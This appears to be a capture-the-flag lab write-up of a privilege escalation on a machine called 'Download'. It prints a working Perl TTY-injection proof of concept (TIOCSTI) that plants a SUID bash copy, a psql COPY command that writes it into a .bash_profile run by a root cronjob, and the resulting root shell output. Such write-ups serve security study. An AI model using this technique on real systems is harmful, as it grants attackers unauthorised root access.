InfoSec LAB

Download_Privilege_Escalation

Created: 2 min read

TTY Hijacking

I’ve previously identified an old vulnerability in Linux systems. This vulnerability arises from improper handling of terminals invoked by the su and sudo binaries. Exploiting a root cronjob process that utilizes su -l postgres, I can execute arbitrary commands with the privileges of the root user. At a later stage, I was able to confirm the code execution

Here, I will attempt to gain a shell session as the root user

wesley@download:/tmp$ cat pe.pl 
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, "exit\n".'echo Payload as $(cp /bin/bash /tmp/b && chmod +s /tmp/b)'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}

I just need to set the execution command, cp /bin/bash /tmp/b && chmod +s /tmp/b, to the PoC Perl script This will copy the /bin/bash binary to /tmp/b and set SUID to it

wesley@download:/tmp$ /usr/lib/postgresql/12/bin/psql -h localhost -U download -W -c "COPY (SELECT 'bash -c /tmp/pe.pl') TO '/var/lib/postgresql/.bash_profile';" ; cat /var/lib/postgresql/.bash_profile
password: 
COPY 1
bash -c /tmp/pe.pl

Having the root cronjob process execute the PoC script directly from the “Logon Script” method from the .bash_profile file..

wesley@download:/tmp$ ll
total 1236
drwxrwxrwt 13 root     root        4096 aug 10 05:15 ./
drwxr-xr-x 19 root     root        4096 jul 19 16:06 ../
-rwsr-sr-x  1 root     root     1183448 aug 10 05:15 b*
-rw-r--r--  1 root     root         288 aug 10 04:16 out.txt
-rwxrwxrwx  1 wesley   wesley       220 aug 10 05:15 pe.pl*

A moment later, the SUID binary,b can be found at the /tmp directory

wesley@download:/tmp$ /tmp/b -p
b-5.0# whoami
root
b-5.0# hostname
download
b-5.0# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.226  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:c4a1  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:c4a1  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:c4:a1  txqueuelen 1000  (Ethernet)
        RX packets 22559  bytes 5697257 (5.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26626  bytes 4487071 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 39139  bytes 5844332 (5.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 39139  bytes 5844332 (5.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks